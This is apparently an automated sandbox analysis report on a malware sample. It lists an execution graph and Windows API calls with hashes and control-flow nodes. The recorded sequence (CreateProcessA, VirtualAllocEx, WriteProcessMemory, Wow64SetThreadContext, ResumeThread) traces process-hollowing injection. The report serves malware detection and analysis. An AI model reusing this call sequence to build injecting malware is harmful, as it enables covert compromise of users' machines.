                                            execution_graph 36115 13cd0b8 36116 13cd0fe 36115->36116 36120 13cd298 36116->36120 36123 13cd287 36116->36123 36117 13cd1eb 36128 13cc9a0 36120->36128 36124 13cd292 36123->36124 36125 13cd24b 36123->36125 36126 13cc9a0 DuplicateHandle 36124->36126 36125->36117 36127 13cd2c6 36126->36127 36127->36117 36129 13cd300 DuplicateHandle 36128->36129 36130 13cd2c6 36129->36130 36130->36117 36148 5246db0 36149 5246ddd 36148->36149 36156 5246b50 36149->36156 36151 5246e97 36160 5246b60 36151->36160 36153 5246ec9 36164 5246b70 36153->36164 36155 5246efb 36157 5246b5b 36156->36157 36158 5246b60 4 API calls 36157->36158 36159 5247d99 36158->36159 36159->36151 36161 5246b6b 36160->36161 36168 13c5c9c 36161->36168 36162 5247e4b 36162->36153 36165 5246b7b 36164->36165 36166 5249e8f 36165->36166 36290 5248f58 36165->36290 36166->36155 36169 13c5ca7 36168->36169 36171 13c8653 36169->36171 36175 13cad00 36169->36175 36170 13c8691 36170->36162 36171->36170 36179 13ccdf0 36171->36179 36184 13ccde1 36171->36184 36189 13cad38 36175->36189 36193 13cad27 36175->36193 36176 13cad16 36176->36171 36181 13cce11 36179->36181 36180 13cce35 36180->36170 36181->36180 36225 13ccf8f 36181->36225 36229 13ccfa0 36181->36229 36186 13ccdf0 36184->36186 36185 13cce35 36185->36170 36186->36185 36187 13ccf8f 4 API calls 36186->36187 36188 13ccfa0 4 API calls 36186->36188 36187->36185 36188->36185 36197 13cae21 36189->36197 36205 13cae30 36189->36205 36190 13cad47 36190->36176 36194 13cad47 36193->36194 36195 13cae30 2 API calls 36193->36195 36196 13cae21 2 API calls 36193->36196 36194->36176 36195->36194 36196->36194 36198 13cae41 36197->36198 36199 13cae64 36197->36199 36198->36199 36213 13cb0c8 36198->36213 36217 13cb0b9 36198->36217 36199->36190 36200 13cae5c 36200->36199 36201 13cb068 GetModuleHandleW 36200->36201 36202 13cb095 36201->36202 36202->36190 36206 13cae41 36205->36206 36207 13cae64 36205->36207 36206->36207 36211 13cb0c8 LoadLibraryExW 36206->36211 36212 13cb0b9 LoadLibraryExW 36206->36212 36207->36190 36208 13cae5c 36208->36207 36209 13cb068 GetModuleHandleW 36208->36209 36210 13cb095 36209->36210 36210->36190 36211->36208 36212->36208 36214 13cb0dc 36213->36214 36216 13cb101 36214->36216 36221 13ca870 36214->36221 36216->36200 36218 13cb0c8 36217->36218 36219 13ca870 LoadLibraryExW 36218->36219 36220 13cb101 36218->36220 36219->36220 36220->36200 36222 13cb2a8 LoadLibraryExW 36221->36222 36224 13cb321 36222->36224 36224->36216 36227 13ccfad 36225->36227 36226 13ccfe7 36226->36180 36227->36226 36233 13cc8d8 36227->36233 36230 13ccfad 36229->36230 36231 13ccfe7 36230->36231 36232 13cc8d8 4 API calls 36230->36232 36231->36180 36232->36231 36234 13cc8dd 36233->36234 36236 13cd8f8 36234->36236 36237 13cca04 36234->36237 36236->36236 36238 13cca0f 36237->36238 36239 13c5c9c 4 API calls 36238->36239 36240 13cd967 36239->36240 36244 13cf6c8 36240->36244 36249 13cf6e0 36240->36249 36241 13cd9a1 36241->36236 36246 13cf6e0 36244->36246 36245 13cf71d 36245->36241 36246->36245 36255 5240db8 36246->36255 36262 5240dc8 36246->36262 36251 13cf711 36249->36251 36252 13cf811 36249->36252 36250 13cf71d 36250->36241 36251->36250 36253 5240db8 CreateWindowExW 36251->36253 36254 5240dc8 CreateWindowExW 36251->36254 36252->36241 36253->36252 36254->36252 36257 5240dc8 36255->36257 36256 5240ea2 36256->36256 36257->36256 36269 5241c10 36257->36269 36274 5241bf2 36257->36274 36279 5241c90 36257->36279 36283 5241ca0 36257->36283 36263 5240df3 36262->36263 36264 5240ea2 36263->36264 36265 5241c10 CreateWindowExW 36263->36265 36266 5241ca0 CreateWindowExW 36263->36266 36267 5241c90 CreateWindowExW 36263->36267 36268 5241bf2 CreateWindowExW 36263->36268 36265->36264 36266->36264 36267->36264 36268->36264 36270 5241c15 36269->36270 36271 5241c33 36270->36271 36286 5240aa8 36270->36286 36271->36256 36275 5241bfb 36274->36275 36275->36256 36276 5241c33 36275->36276 36277 5240aa8 CreateWindowExW 36275->36277 36276->36256 36278 5241cd5 36277->36278 36278->36256 36280 5241ca0 36279->36280 36281 5240aa8 CreateWindowExW 36280->36281 36282 5241cd5 36281->36282 36282->36256 36284 5240aa8 CreateWindowExW 36283->36284 36285 5241cd5 36284->36285 36285->36256 36287 5241cf0 CreateWindowExW 36286->36287 36289 5241e14 36287->36289 36289->36289 36291 5248f63 36290->36291 36293 13c5c9c 4 API calls 36291->36293 36292 5249f14 36292->36166 36293->36292 36294 13c4668 36295 13c467a 36294->36295 36296 13c4686 36295->36296 36300 13c4778 36295->36300 36305 13c3e1c 36296->36305 36298 13c46a5 36301 13c479d 36300->36301 36309 13c4888 36301->36309 36313 13c4878 36301->36313 36306 13c3e27 36305->36306 36321 13c5c1c 36306->36321 36308 13c6ff0 36308->36298 36310 13c48af 36309->36310 36312 13c498c 36310->36312 36317 13c449c 36310->36317 36314 13c4888 36313->36314 36315 13c498c 36314->36315 36316 13c449c CreateActCtxA 36314->36316 36315->36315 36316->36315 36318 13c5918 CreateActCtxA 36317->36318 36320 13c59db 36318->36320 36322 13c5c27 36321->36322 36325 13c5c3c 36322->36325 36324 13c7095 36324->36308 36326 13c5c47 36325->36326 36329 13c5c6c 36326->36329 36328 13c717a 36328->36324 36330 13c5c77 36329->36330 36331 13c5c9c 4 API calls 36330->36331 36332 13c726d 36331->36332 36332->36328 36548 128d01c 36549 128d034 36548->36549 36550 128d08e 36549->36550 36555 5240ad4 36549->36555 36564 5241ea8 36549->36564 36568 5242c08 36549->36568 36577 5241e97 36549->36577 36556 5240adf 36555->36556 36557 5242c79 36556->36557 36559 5242c69 36556->36559 36597 5240bfc 36557->36597 36581 5242da0 36559->36581 36586 5242d91 36559->36586 36591 5242e6c 36559->36591 36560 5242c77 36565 5241ece 36564->36565 36566 5240ad4 CallWindowProcW 36565->36566 36567 5241eef 36566->36567 36567->36550 36569 5242c18 36568->36569 36570 5242c79 36569->36570 36573 5242c69 36569->36573 36571 5240bfc CallWindowProcW 36570->36571 36572 5242c77 36571->36572 36574 5242da0 CallWindowProcW 36573->36574 36575 5242d91 CallWindowProcW 36573->36575 36576 5242e6c CallWindowProcW 36573->36576 36574->36572 36575->36572 36576->36572 36578 5241ece 36577->36578 36579 5240ad4 CallWindowProcW 36578->36579 36580 5241eef 36579->36580 36580->36550 36583 5242db4 36581->36583 36582 5242e40 36582->36560 36601 5242e47 36583->36601 36605 5242e58 36583->36605 36587 5242da0 36586->36587 36589 5242e47 CallWindowProcW 36587->36589 36590 5242e58 CallWindowProcW 36587->36590 36588 5242e40 36588->36560 36589->36588 36590->36588 36592 5242e2a 36591->36592 36593 5242e7a 36591->36593 36595 5242e47 CallWindowProcW 36592->36595 36596 5242e58 CallWindowProcW 36592->36596 36594 5242e40 36594->36560 36595->36594 36596->36594 36598 5240c07 36597->36598 36599 524435a CallWindowProcW 36598->36599 36600 5244309 36598->36600 36599->36600 36600->36560 36602 5242e58 36601->36602 36603 5242e69 36602->36603 36608 5244292 36602->36608 36603->36582 36606 5242e69 36605->36606 36607 5244292 CallWindowProcW 36605->36607 36606->36582 36607->36606 36609 5240bfc CallWindowProcW 36608->36609 36610 52442aa 36609->36610 36610->36603 36131 766ba60 36132 766ba7e 36131->36132 36133 766ba88 36131->36133 36136 766bab3 36132->36136 36140 766bac8 36132->36140 36137 766bad3 36136->36137 36145 766ad54 36137->36145 36141 766bad6 36140->36141 36144 766baf5 36140->36144 36142 766ad54 FindCloseChangeNotification 36141->36142 36143 766baf1 36142->36143 36143->36133 36144->36133 36146 766bc40 FindCloseChangeNotification 36145->36146 36147 766baf1 36146->36147 36147->36133 36611 766af90 36612 766b11b 36611->36612 36613 766afb6 36611->36613 36613->36612 36615 766ab7c 36613->36615 36616 766b210 PostMessageW 36615->36616 36617 766b27c 36616->36617 36617->36613 36618 76690dd 36619 7669045 36618->36619 36620 7668f9a 36619->36620 36622 7669a96 12 API calls 36619->36622 36623 7669a22 12 API calls 36619->36623 36624 7669a30 12 API calls 36619->36624 36621 7669321 36622->36621 36623->36621 36624->36621 36333 766930a 36334 7669310 36333->36334 36335 7669321 36334->36335 36339 7669a96 36334->36339 36360 7669a30 36334->36360 36379 7669a22 36334->36379 36340 7669a24 36339->36340 36343 7669a99 36339->36343 36341 76699ea 36340->36341 36399 766a210 36340->36399 36406 766a12b 36340->36406 36413 766a821 36340->36413 36418 766a6a2 36340->36418 36425 7669e65 36340->36425 36429 766a024 36340->36429 36436 766a224 36340->36436 36445 766a706 36340->36445 36450 766a286 36340->36450 36455 766a618 36340->36455 36459 7669eba 36340->36459 36466 766a5fa 36340->36466 36471 7669f3a 36340->36471 36477 766a19c 36340->36477 36485 7669f11 36340->36485 36490 766a0d0 36340->36490 36341->36335 36342 7669a52 36342->36335 36343->36335 36361 7669a4a 36360->36361 36363 766a286 2 API calls 36361->36363 36364 766a706 2 API calls 36361->36364 36365 766a224 4 API calls 36361->36365 36366 766a024 4 API calls 36361->36366 36367 7669e65 2 API calls 36361->36367 36368 766a6a2 4 API calls 36361->36368 36369 766a821 2 API calls 36361->36369 36370 766a12b 4 API calls 36361->36370 36371 766a210 4 API calls 36361->36371 36372 766a0d0 6 API calls 36361->36372 36373 7669f11 2 API calls 36361->36373 36374 766a19c 4 API calls 36361->36374 36375 7669f3a 2 API calls 36361->36375 36376 766a5fa 2 API calls 36361->36376 36377 7669eba 4 API calls 36361->36377 36378 766a618 2 API calls 36361->36378 36362 7669a52 36362->36335 36363->36362 36364->36362 36365->36362 36366->36362 36367->36362 36368->36362 36369->36362 36370->36362 36371->36362 36372->36362 36373->36362 36374->36362 36375->36362 36376->36362 36377->36362 36378->36362 36380 7669a24 36379->36380 36381 76699ea 36380->36381 36383 766a286 2 API calls 36380->36383 36384 766a706 2 API calls 36380->36384 36385 766a224 4 API calls 36380->36385 36386 766a024 4 API calls 36380->36386 36387 7669e65 2 API calls 36380->36387 36388 766a6a2 4 API calls 36380->36388 36389 766a821 2 API calls 36380->36389 36390 766a12b 4 API calls 36380->36390 36391 766a210 4 API calls 36380->36391 36392 766a0d0 6 API calls 36380->36392 36393 7669f11 2 API calls 36380->36393 36394 766a19c 4 API calls 36380->36394 36395 7669f3a 2 API calls 36380->36395 36396 766a5fa 2 API calls 36380->36396 36397 7669eba 4 API calls 36380->36397 36398 766a618 2 API calls 36380->36398 36381->36335 36382 7669a52 36382->36335 36383->36382 36384->36382 36385->36382 36386->36382 36387->36382 36388->36382 36389->36382 36390->36382 36391->36382 36392->36382 36393->36382 36394->36382 36395->36382 36396->36382 36397->36382 36398->36382 36400 7669ec6 36399->36400 36401 766a1f5 36400->36401 36499 76688c0 36400->36499 36503 76688b8 36400->36503 36507 76689b0 36400->36507 36511 76689a9 36400->36511 36401->36342 36407 7669ec6 36406->36407 36408 766a1f5 36407->36408 36409 76688c0 WriteProcessMemory 36407->36409 36410 76688b8 WriteProcessMemory 36407->36410 36411 76689b0 ReadProcessMemory 36407->36411 36412 76689a9 ReadProcessMemory 36407->36412 36408->36342 36409->36407 36410->36407 36411->36407 36412->36407 36414 766a82e 36413->36414 36415 766a020 36413->36415 36415->36413 36416 76688c0 WriteProcessMemory 36415->36416 36417 76688b8 WriteProcessMemory 36415->36417 36416->36415 36417->36415 36419 7669ec6 36418->36419 36420 766a1f5 36419->36420 36421 76688c0 WriteProcessMemory 36419->36421 36422 76688b8 WriteProcessMemory 36419->36422 36423 76689b0 ReadProcessMemory 36419->36423 36424 76689a9 ReadProcessMemory 36419->36424 36420->36342 36421->36419 36422->36419 36423->36419 36424->36419 36515 7668b3c 36425->36515 36520 7668b48 36425->36520 36430 7669ec6 36429->36430 36430->36342 36431 766a1f5 36430->36431 36432 76688c0 WriteProcessMemory 36430->36432 36433 76688b8 WriteProcessMemory 36430->36433 36434 76689b0 ReadProcessMemory 36430->36434 36435 76689a9 ReadProcessMemory 36430->36435 36431->36342 36432->36430 36433->36430 36434->36430 36435->36430 36437 7669ec6 36436->36437 36439 76689b0 ReadProcessMemory 36436->36439 36440 76689a9 ReadProcessMemory 36436->36440 36438 766a1f5 36437->36438 36441 76688c0 WriteProcessMemory 36437->36441 36442 76688b8 WriteProcessMemory 36437->36442 36443 76689b0 ReadProcessMemory 36437->36443 36444 76689a9 ReadProcessMemory 36437->36444 36438->36342 36439->36437 36440->36437 36441->36437 36442->36437 36443->36437 36444->36437 36446 766a70c 36445->36446 36524 7668671 36446->36524 36528 7668678 36446->36528 36447 766a732 36451 766a020 36450->36451 36452 766a82e 36451->36452 36453 76688c0 WriteProcessMemory 36451->36453 36454 76688b8 WriteProcessMemory 36451->36454 36453->36451 36454->36451 36532 7668800 36455->36532 36536 76687f8 36455->36536 36456 766a636 36460 7669ec6 36459->36460 36461 766a1f5 36460->36461 36462 76688c0 WriteProcessMemory 36460->36462 36463 76688b8 WriteProcessMemory 36460->36463 36464 76689b0 ReadProcessMemory 36460->36464 36465 76689a9 ReadProcessMemory 36460->36465 36461->36342 36462->36460 36463->36460 36464->36460 36465->36460 36467 766a600 36466->36467 36469 7668671 ResumeThread 36467->36469 36470 7668678 ResumeThread 36467->36470 36468 766a732 36469->36468 36470->36468 36473 7669f3f 36471->36473 36472 766a497 36472->36342 36473->36472 36475 7668671 ResumeThread 36473->36475 36476 7668678 ResumeThread 36473->36476 36474 766a732 36475->36474 36476->36474 36540 7668720 36477->36540 36544 7668728 36477->36544 36478 766a1b6 36479 766a81b 36478->36479 36483 7668671 ResumeThread 36478->36483 36484 7668678 ResumeThread 36478->36484 36480 766a732 36483->36480 36484->36480 36486 7669f34 36485->36486 36488 76688c0 WriteProcessMemory 36486->36488 36489 76688b8 WriteProcessMemory 36486->36489 36487 766a520 36488->36487 36489->36487 36497 7668720 Wow64SetThreadContext 36490->36497 36498 7668728 Wow64SetThreadContext 36490->36498 36491 7669ec6 36491->36342 36492 766a1f5 36491->36492 36493 76688c0 WriteProcessMemory 36491->36493 36494 76688b8 WriteProcessMemory 36491->36494 36495 76689b0 ReadProcessMemory 36491->36495 36496 76689a9 ReadProcessMemory 36491->36496 36492->36342 36493->36491 36494->36491 36495->36491 36496->36491 36497->36491 36498->36491 36500 7668908 WriteProcessMemory 36499->36500 36502 766895f 36500->36502 36502->36400 36504 76688c0 WriteProcessMemory 36503->36504 36506 766895f 36504->36506 36506->36400 36508 76689fb ReadProcessMemory 36507->36508 36510 7668a3f 36508->36510 36510->36400 36512 76689fb ReadProcessMemory 36511->36512 36514 7668a3f 36512->36514 36514->36400 36516 7668af9 36515->36516 36517 7668b46 CreateProcessA 36515->36517 36516->36342 36519 7668d93 36517->36519 36519->36519 36521 7668bd1 CreateProcessA 36520->36521 36523 7668d93 36521->36523 36525 76686b8 ResumeThread 36524->36525 36527 76686e9 36525->36527 36527->36447 36529 76686b8 ResumeThread 36528->36529 36531 76686e9 36529->36531 36531->36447 36533 7668840 VirtualAllocEx 36532->36533 36535 766887d 36533->36535 36535->36456 36537 7668840 VirtualAllocEx 36536->36537 36539 766887d 36537->36539 36539->36456 36541 7668728 Wow64SetThreadContext 36540->36541 36543 76687b5 36541->36543 36543->36478 36545 766876d Wow64SetThreadContext 36544->36545 36547 76687b5 36545->36547 36547->36478

                                            Executed Functions

                                            Function 05246DB0 Relevance: .9, Instructions: 949COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2002943907.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5240000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b74463e01bd7b4810e9d4a5316a27869e66169bfb63b4cb5b2635e73c9526a6
                                            • Instruction ID: dc96de16d5c90bab23401d0e3bb81d26c7f9bcf2977bb128e30154187f65ed5e
                                            • Opcode Fuzzy Hash: 1b74463e01bd7b4810e9d4a5316a27869e66169bfb63b4cb5b2635e73c9526a6
                                            • Instruction Fuzzy Hash: D8A2F874A10619CFCB14DF68C994AD9BBB2FF89300F1585E9D509AB361DB30AE85CF90
                                            Function 05246D50 Relevance: .9, Instructions: 908COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2002943907.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5240000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c68fe3bdf18e41d9d13a006dbd6d16ac8c1a4e057a8d801370bfea91c4d57ab7
                                            • Instruction ID: ffa6d0e3691d84ea4cc246e8b3137575a395b7c0480ba1b5e926e5f635d5da07
                                            • Opcode Fuzzy Hash: c68fe3bdf18e41d9d13a006dbd6d16ac8c1a4e057a8d801370bfea91c4d57ab7
                                            • Instruction Fuzzy Hash: 0492E934A10619CFCB19DF64C998AD9B7B2FF8A304F1485E9D409AB361DB71AE85CF40
                                            Function 07662F20 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d4142e76e224b0a91e8169a0fb6f7d004e2859e6d134b1a310797c91ef614b4c
                                            • Instruction ID: 169ce2bff5d3f7f9674bc5a26e85f89a8d3ecaea8814028f29ef22adeeed4c3a
                                            • Opcode Fuzzy Hash: d4142e76e224b0a91e8169a0fb6f7d004e2859e6d134b1a310797c91ef614b4c
                                            • Instruction Fuzzy Hash: DF21B6B1D116189BEB18CFA7D9593DEFBF2AFC9300F04C06AD409B62A4EB7409468F51
                                            Function 07668B3C Relevance: 1.8, APIs: 1, Instructions: 268processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 579 7668b3c-7668b44 580 7668b46-7668bdd 579->580 581 7668af9-7668b02 579->581 588 7668c16-7668c36 580->588 589 7668bdf-7668be9 580->589 582 7668b04-7668b0a 581->582 583 7668b0b-7668b30 581->583 582->583 597 7668c6f-7668c9e 588->597 598 7668c38-7668c42 588->598 589->588 590 7668beb-7668bed 589->590 592 7668c10-7668c13 590->592 593 7668bef-7668bf9 590->593 592->588 595 7668bfd-7668c0c 593->595 596 7668bfb 593->596 595->595 599 7668c0e 595->599 596->595 606 7668cd7-7668d91 CreateProcessA 597->606 607 7668ca0-7668caa 597->607 598->597 600 7668c44-7668c46 598->600 599->592 601 7668c48-7668c52 600->601 602 7668c69-7668c6c 600->602 604 7668c56-7668c65 601->604 605 7668c54 601->605 602->597 604->604 608 7668c67 604->608 605->604 618 7668d93-7668d99 606->618 619 7668d9a-7668e20 606->619 607->606 609 7668cac-7668cae 607->609 608->602 611 7668cb0-7668cba 609->611 612 7668cd1-7668cd4 609->612 613 7668cbe-7668ccd 611->613 614 7668cbc 611->614 612->606 613->613 616 7668ccf 613->616 614->613 616->612 618->619 629 7668e22-7668e26 619->629 630 7668e30-7668e34 619->630 629->630 633 7668e28 629->633 631 7668e36-7668e3a 630->631 632 7668e44-7668e48 630->632 631->632 634 7668e3c 631->634 635 7668e4a-7668e4e 632->635 636 7668e58-7668e5c 632->636 633->630 634->632 635->636 637 7668e50 635->637 638 7668e6e-7668e75 636->638 639 7668e5e-7668e64 636->639 637->636 640 7668e77-7668e86 638->640 641 7668e8c 638->641 639->638 640->641 642 7668e8d 641->642 642->642
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07668D7E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: cf32be193cac4ac4db1b3c7fae527d0874d8d95f06b6e1dc55810b27e565cad0
                                            • Instruction ID: b4476746450f898303e6c09e0f4681d90d8e0cd85f869e5966031899f1d8910b
                                            • Opcode Fuzzy Hash: cf32be193cac4ac4db1b3c7fae527d0874d8d95f06b6e1dc55810b27e565cad0
                                            • Instruction Fuzzy Hash: B7A16BB1D0021ACFDB24DF69C844BEEBBB2BF48314F54856AD809A7240DB759985CF92
                                            Function 07668B48 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 644 7668b48-7668bdd 646 7668c16-7668c36 644->646 647 7668bdf-7668be9 644->647 654 7668c6f-7668c9e 646->654 655 7668c38-7668c42 646->655 647->646 648 7668beb-7668bed 647->648 649 7668c10-7668c13 648->649 650 7668bef-7668bf9 648->650 649->646 652 7668bfd-7668c0c 650->652 653 7668bfb 650->653 652->652 656 7668c0e 652->656 653->652 663 7668cd7-7668d91 CreateProcessA 654->663 664 7668ca0-7668caa 654->664 655->654 657 7668c44-7668c46 655->657 656->649 658 7668c48-7668c52 657->658 659 7668c69-7668c6c 657->659 661 7668c56-7668c65 658->661 662 7668c54 658->662 659->654 661->661 665 7668c67 661->665 662->661 675 7668d93-7668d99 663->675 676 7668d9a-7668e20 663->676 664->663 666 7668cac-7668cae 664->666 665->659 668 7668cb0-7668cba 666->668 669 7668cd1-7668cd4 666->669 670 7668cbe-7668ccd 668->670 671 7668cbc 668->671 669->663 670->670 673 7668ccf 670->673 671->670 673->669 675->676 686 7668e22-7668e26 676->686 687 7668e30-7668e34 676->687 686->687 690 7668e28 686->690 688 7668e36-7668e3a 687->688 689 7668e44-7668e48 687->689 688->689 691 7668e3c 688->691 692 7668e4a-7668e4e 689->692 693 7668e58-7668e5c 689->693 690->687 691->689 692->693 694 7668e50 692->694 695 7668e6e-7668e75 693->695 696 7668e5e-7668e64 693->696 694->693 697 7668e77-7668e86 695->697 698 7668e8c 695->698 696->695 697->698 699 7668e8d 698->699 699->699
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07668D7E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2004020985.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7660000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 31d04e13ba099f7a38c598cc2dccf2c4a7e7aa6dfe2781b26c21e839705c904a
                                            • Instruction ID: b1022b9c8b191e1e0e57f0802da8f1aaac4a1a603df05c1268b399915852ac32
                                            • Opcode Fuzzy Hash: 31d04e13ba099f7a38c598cc2dccf2c4a7e7aa6dfe2781b26c21e839705c904a
                                            • Instruction Fuzzy Hash: EA916BB1D0071ACFDB24CF69C844BEEBBB2BF48314F5485A9D809A7240DB749985CF92
                                            Function 013CAE30 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 701 13cae30-13cae3f 702 13cae6b-13cae6f 701->702 703 13cae41-13cae4e call 13c9838 701->703 704 13cae71-13cae7b 702->704 705 13cae83-13caec4 702->705 708 13cae64 703->708 709 13cae50 703->709 704->705 712 13caec6-13caece 705->712 713 13caed1-13caedf 705->713 708->702 756 13cae56 call 13cb0c8 709->756 757 13cae56 call 13cb0b9 709->757 712->713 715 13caee1-13caee6 713->715 716 13caf03-13caf05 713->716 714 13cae5c-13cae5e 714->708 719 13cafa0-13cb060 714->719 717 13caee8-13caeef call 13ca814 715->717 718 13caef1 715->718 720 13caf08-13caf0f 716->720 722 13caef3-13caf01 717->722 718->722 751 13cb068-13cb093 GetModuleHandleW 719->751 752 13cb062-13cb065 719->752 723 13caf1c-13caf23 720->723 724 13caf11-13caf19 720->724 722->720 726 13caf25-13caf2d 723->726 727 13caf30-13caf39 call 13ca824 723->727 724->723 726->727 732 13caf3b-13caf43 727->732 733 13caf46-13caf4b 727->733 732->733 735 13caf4d-13caf54 733->735 736 13caf69-13caf6d 733->736 735->736 737 13caf56-13caf66 call 13ca834 call 13ca844 735->737 740 13caf73-13caf76 736->740 737->736 742 13caf78-13caf96 740->742 743 13caf99-13caf9f 740->743 742->743 753 13cb09c-13cb0b0 751->753 754 13cb095-13cb09b 751->754 752->751 754->753 756->714 757->714
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 013CB086
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 11c95337bdbbe85418713ebe63fe68823fa6e69ae89e94757ffcdc7d1e11e739
                                            • Instruction ID: c0ef86ad406fcc0310790186e111428d27b9508bc046b698c1e0d9a83282d13f
                                            • Opcode Fuzzy Hash: 11c95337bdbbe85418713ebe63fe68823fa6e69ae89e94757ffcdc7d1e11e739
                                            • Instruction Fuzzy Hash: C27148B0A00B4A8FD724DF29D54475ABBF5FF88708F00892DD44AD7A90E775E949CB90
                                            Function 013C590C Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 758 13c590c-13c5914 759 13c5916-13c59d9 CreateActCtxA 758->759 760 13c58b0-13c58d9 758->760 763 13c59db-13c59e1 759->763 764 13c59e2-13c5a3c 759->764 765 13c58db-13c58e1 760->765 766 13c58e2-13c5903 760->766 763->764 774 13c5a3e-13c5a41 764->774 775 13c5a4b-13c5a4f 764->775 765->766 774->775 776 13c5a60 775->776 777 13c5a51-13c5a5d 775->777 779 13c5a61 776->779 777->776 779->779
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 013C59C9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2000943195.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_13c0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 61b27293c63eadcb5d6d9c5448c82368acfcc0c14adf6ae7dd21efc46ff8dde1
                                            • Instruction ID: 0255a1e114f85b5f08bfcb0634db92b0c51674515f8ef6aecd687030e0bd55e9
                                            • Opcode Fuzzy Hash: 61b27293c63eadcb5d6d9c5448c82368acfcc0c14adf6ae7dd21efc46ff8dde1
                                            • Instruction Fuzzy Hash: DF5133B1D00319CEEB24CFAAC8847DEBBF1BF48708F20806AD408AB251D7756949CF91
                                            Function 05240AA8 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 780 5240aa8-5241d56 782 5241d61-5241d68 780->782 783 5241d58-5241d5e 780->783 784 5241d73-5241e12 CreateWindowExW 782->784 785 5241d6a-5241d70 782->785 783->782 787 5241e14-5241e1a 784->787 788 5241e1b-5241e53 784->788 785->784 787->788 792 5241e55-5241e58 788->792 793 5241e60 788->793 792->793 794 5241e61 793->794 794->794
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05241E02
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2002943907.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5240000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 4d54f260b808ed701f1641218ee8eb1d66de9fc3e72ca1cbdc478bcc51e6fed8
                                            • Instruction ID: f0126756411e9a42ff5e41dfb646a95b8fd93c55d8435aa8d715882e770d67a0
                                            • Opcode Fuzzy Hash: 4d54f260b808ed701f1641218ee8eb1d66de9fc3e72ca1cbdc478bcc51e6fed8
                                            • Instruction Fuzzy Hash: E951E5B1D10309DFDB14CF99C984ADDBBB5FF48300F64812AE819A7250D7759895CF91
                                            Function 05241CE5 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 795 5241ce5-5241d56 796 5241d61-5241d68 795->796 797 5241d58-5241d5e 795->797 798 5241d73-5241dab 796->798 799 5241d6a-5241d70 796->799 797->796 800 5241db3-5241e12 CreateWindowExW 798->800 799->798 801 5241e14-5241e1a 800->801 802 5241e1b-5241e53 800->802 801->802 806 5241e55-5241e58 802->806 807 5241e60 802->807 806->807 808 5241e61 807->808 808->808
                                            APIs
